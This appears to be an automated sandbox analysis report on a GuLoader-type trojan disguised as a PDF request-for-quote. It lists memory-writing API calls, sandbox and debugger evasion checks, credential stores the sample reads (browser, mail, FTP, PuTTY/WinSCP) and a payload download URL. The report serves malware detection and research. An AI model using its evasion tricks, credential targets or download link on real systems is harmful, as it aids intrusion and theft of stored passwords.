      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7E79 NtWriteVirtualMemory,0_2_020B7E79
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7EC2 NtWriteVirtualMemory,0_2_020B7EC2
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F3D NtWriteVirtualMemory,0_2_020B7F3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F31 NtWriteVirtualMemory,0_2_020B7F31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7F81 NtWriteVirtualMemory,0_2_020B7F81
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7FA5 NtWriteVirtualMemory,0_2_020B7FA5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C3D NtWriteVirtualMemory,0_2_020B7C3D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C31 NtWriteVirtualMemory,0_2_020B7C31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C7A NtWriteVirtualMemory,0_2_020B7C7A
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7C85 NtWriteVirtualMemory,0_2_020B7C85
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7CA9 NtWriteVirtualMemory,0_2_020B7CA9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8CFB NtWriteVirtualMemory,0_2_020B8CFB
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D25 NtWriteVirtualMemory,0_2_020B7D25
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B7D31 NtWriteVirtualMemory,0_2_020B7D31
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD07 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FD07
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FEC2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FEC2
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD59 NtProtectVirtualMemory,8_2_0056FD59
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD4D NtProtectVirtualMemory,8_2_0056FD4D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FF79 NtProtectVirtualMemory,8_2_0056FF79
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FE11 NtProtectVirtualMemory,8_2_0056FE11
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD00 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FD00
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FF09 NtProtectVirtualMemory,8_2_0056FF09
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD30 NtProtectVirtualMemory,8_2_0056FD30
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FC21 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FC21
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FC96 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FC96
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FD9D NtProtectVirtualMemory,8_2_0056FD9D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FE85 NtProtectVirtualMemory,8_2_0056FE85
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FDB5 NtProtectVirtualMemory,8_2_0056FDB5
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FCB9 NtProtectVirtualMemory,8_2_0056FCB9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FCA1 LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FCA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FCAD LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FCAD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 8_2_0056FEAD LdrInitializeThunk,NtProtectVirtualMemory,8_2_0056FEAD
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess Stats: CPU usage > 98%
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000000.670357074.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770681442.0000000002960000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameForm_Fejlfunkt.exeFE2X vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000000.769293326.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exeBinary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
      Source: RFQ 001030112021#U00b7pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: RFQ 001030112021#U00b7pdf.exeStatic PE information: invalid certificate
      Source: RFQ 001030112021#U00b7pdf.exeMetadefender: Detection: 17%
      Source: RFQ 001030112021#U00b7pdf.exeReversingLabs: Detection: 17%
      Source: RFQ 001030112021#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe" Jump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_0040264C push 0040130Eh; ret 0_2_0040265F
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402660 push 0040130Eh; ret 0_2_00402673
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402674 push 0040130Eh; ret 0_2_00402687
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_0040260D push 0040130Eh; ret 0_2_00402623
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00408E1D push 0000000Eh; ret 0_2_00408E20
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402624 push 0040130Eh; ret 0_2_00402637
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402638 push 0040130Eh; ret 0_2_0040264B
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_004026C4 push 0040130Eh; ret 0_2_004026D7
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_004026D8 push 0040130Eh; ret 0_2_004026EB
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_004026EC push 0040130Eh; ret 0_2_004026FF
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402688 push 0040130Eh; ret 0_2_0040269B
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_0040269C push 0040130Eh; ret 0_2_004026AF
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_004076A2 push 0000004Bh; ret 0_2_004076A8
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_004026B0 push 0040130Eh; ret 0_2_004026C3
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402750 push 0040130Eh; ret 0_2_00402763
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402764 push 0040130Eh; ret 0_2_00402777
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402778 push 0040130Eh; ret 0_2_0040278B
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00408B7E push esp; iretd 0_2_00408B7F
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402700 push 0040130Eh; ret 0_2_00402713
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402714 push 0040130Eh; ret 0_2_00402727
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_00402728 push 0040130Eh; ret 0_2_0040273B
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_0040273C push 0040130Eh; ret 0_2_0040274F
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_004061E0 push eax; retf 0_2_0040624D
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_0040278C push 0040130Eh; ret 0_2_0040279F
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_004027A0 push 0040130Eh; ret 0_2_004027B3
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9405 pushad ; retn A0FEh0_2_020B9941
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B51F2 push ecx; retn 0010h0_2_020B51A3
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9629 pushad ; retn A0FEh0_2_020B9941
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9635 pushad ; retn A0FEh0_2_020B9941
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B964D pushad ; retn A0FEh0_2_020B9941
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B9641 pushad ; retn A0FEh0_2_020B9941
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1F5UP5O0CFHZV_GAVQKAQAHPOSXGGLGCB
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 2832Thread sleep count: 678 > 30Jump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 4564Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeWindow / User API: threadDelayed 678Jump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeSystem information queried: ModuleInformationJump to behavior
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWV
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
      Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BC7BF mov eax, dword ptr fs:[00000030h]0_2_020BC7BF
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BBAA1 mov eax, dword ptr fs:[00000030h]0_2_020BBAA1
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BDB82 mov eax, dword ptr fs:[00000030h]0_2_020BDB82
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BD872 mov eax, dword ptr fs:[00000030h]0_2_020BD872
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020B8F54 mov eax, dword ptr fs:[00000030h]0_2_020B8F54
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeCode function: 0_2_020BA6B9 LdrInitializeThunk,0_2_020BA6B9
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeProcess created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe" Jump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Tries to steal Mail credentials (via file / registry access)Show sources
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
      Tries to harvest and steal ftp login credentialsShow sources
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Masquerading1OS Credential Dumping2Security Software Discovery31Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion211Credentials in Registry1Virtualization/Sandbox Evasion211Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
